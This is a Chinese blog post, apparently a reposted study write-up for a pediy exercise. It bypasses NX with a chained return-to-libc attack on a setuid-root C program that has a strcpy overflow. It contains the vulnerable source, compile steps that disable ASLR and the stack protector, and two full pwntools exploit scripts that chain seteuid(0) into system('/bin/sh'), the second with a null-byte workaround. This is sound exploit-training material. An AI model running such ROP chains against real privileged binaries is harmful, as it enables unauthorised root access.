pediy18-5

其他 2019-04-17 12:27:35 阅读次数: 0

使用链式 return-to-libc 绕过 NX 位

漏洞代码

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256];
 seteuid(getuid()); /* Temporarily drop privileges */
 strcpy(buf,argv[1]);
 printf("%s",buf);
 fflush(stdout);
 return 0;
}

编译

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -g -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

这篇也是跟之前学过的类似,有不同的地方就是setuid(0)。

这里可以看出缓冲区距离返回地址的距离为272-4 =268

采用与原文不同的rop链试试行不行。

接下来开始构造ROP

先尝试

setuid(0)

system('/bin/sh')

EXP

扫描二维码关注公众号,回复: 5921344 查看本文章

这里__libc_start_main_addr使用的是上一个程序里的,因为两者libc一样,所以节省了时间。

from pwn import *
from LibcSearcher import LibcSearcher

context.log_level = 'debug'
vuln = ELF('./vuln')
seteuid = vuln.symbols['seteuid']

print 'start get libcbase'
libc_start_main_addr = 0xf7e1d540
libc = LibcSearcher('__libc_start_main',libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
print 'success got libcbase'
system_addr = libcbase +libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')




pop_ret = 0x08048493
payload = "A"*268 + p32(seteuid) + p32(pop_ret) +p32(0)+"AAAA" +p32(system_addr)+"AAAA"+p32(binsh_addr)

sh = process(['./vuln',payload])
sh.interactive()

我在直接使用python脚本的时候无法会提示参数错误,但是在GDB里使用该shellcode可以获取到shell

如图

目前还不知道原因。

时隔2个小时,知道了。

strcpy里不能遇到\x00结尾的,否则会结束输入。我们必须避免这个问题。

既然是0的问题,就用已知的0来替换0。

利用ROPgadget来搜索elf文件中存在的字符串'0'

然后直接调用setuid(0),再继续调用system('bin/sh')即可。

EXP

from pwn import *
from LibcSearcher import LibcSearcher

context.log_level = 'debug'
vuln = ELF('./vuln')
seteuid = vuln.symbols['seteuid']

print 'start get libcbase'
libc_start_main_addr = 0xf7e1d540
libc = LibcSearcher('__libc_start_main',libc_start_main_addr)
libcbase = libc_start_main_addr - libc.dump('__libc_start_main')
print 'success got libcbase'
system_addr = libcbase +libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')




pop_ret = 0x08048493
payload = "A"*268 + p32(seteuid) + p32(pop_ret) +p32(0x08048220) +p32(system_addr)+"AAAA"+p32(binsh_addr)

sh = process(['./vuln',payload])
sh.interactive()

猜你喜欢

转载自blog.csdn.net/qq_38025365/article/details/88775869
今日推荐
好书推荐《ChatGPT原理与架构:大模型的预训练、迁移和中间件编程 》
Baidu Comate 智能编码助手:编程新伙伴,效率新飞跃
AI时代:人工智能大模型引领科技创造新时代
百篇博客 · 千里之行
开源王者!全球最强的开源大模型Llama3发布!15万亿数据集训练,最高4000亿参数,数学评测超过GPT-4,全球第二!
为欧拉系统安装可视化界面(deepin)
MobaXterm中文版(MobaXterm-Chinese-Simplified)安装和使用
JS 网页全自动翻译 v3.4 发布,开放对 html 文件的翻译能力
这是Linus最忍不了的一集——虚幻引擎代码规范禁止使用脏话、禁止slave、master
与 Apollo 共创生态:观看7周年大会的心路历程
与 Apollo 共创生态:Apollo7周年大会的心得体会,干货满满
国内各种免费AI聊天机器人(ChatGPT)推荐(上)
周排行
php 截取字符串长度 并 把超出规定长度的内容用...替代
生成3x3矩阵(2):FIFO法的分析和改进
PyTorch Hub发布!一行代码调用所有模型:torch.hub
Unity中添加不规则图片按钮,只有在点击到图片后才触发点击效果
AI - TensorFlow - 示例01:基本分类
Andy's First Dictionary(UVA - 10815 )集合set
IOS下Nil & nil & NULL 区别
swift 封装按钮倒计时
C. Maximum Median 二分
LSTM神经网络输入输出究竟是怎样的?
每日归档
更多
2024-05-26(6)
2024-05-25(68)
2024-05-24(65)
2024-05-23(9)
2024-05-22(41)
2024-05-21(8)
2024-05-20(36)
2024-05-19(0)
2024-05-18(4)
2024-05-17(34)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022